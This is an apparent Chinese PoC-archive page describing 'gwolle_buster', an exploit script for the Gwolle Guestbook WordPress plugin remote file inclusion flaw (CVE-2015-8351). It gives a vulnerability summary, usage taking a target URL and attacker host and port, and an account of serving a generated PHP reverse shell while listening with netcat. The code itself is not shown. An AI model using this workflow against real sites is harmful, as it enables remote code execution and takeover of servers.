POC详情: db45db92d0b0efdccbb308b7a34eb73bbe78c84c

来源
关联漏洞
标题: WordPress Gwolle Guestbook插件安全漏洞 (CVE-2015-8351)
描述:WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。Gwolle Guestbook是其中的一个留言板插件。 WordPress Gwolle Guestbook插件1.5.3及之前版本中存在远程文件包含漏洞,该漏洞源于程序没有充分过滤用户提交的输入。远程攻击者可通过向frontend/captcha/ajaxresponse.php文件发送带有URL的‘abspath’参数利用该漏洞执行任意的PHP代码。
描述
this script is exploit for wordpress old plugin gwolle
介绍
# gwolle_buster
this script is exploit for wordpress old plugin gwolle

usage:

./gwolle_buster.py <target_url> <Lhost> <Lport>

first arguments <target_url> => your target url of wordpress that installed gwolle
second arguments <Lhost> => your ip
third arguments <Lport> => listening port for reverse shell 

example: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234

This Script will generate the php reverse shell script and bind the simple server,
so you need open the 2 new terminal and listen the netcat at first terminal, and request with curl commands,
however, commands are auto generate and appear at console,
therefore you can copy and paste easily 
文件快照

[4.0K] /data/pocs/db45db92d0b0efdccbb308b7a34eb73bbe78c84c ├── [5.5K] gwolle_buster.py ├── [ 670] README.md └── [2.1K] reverse_shell.php 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。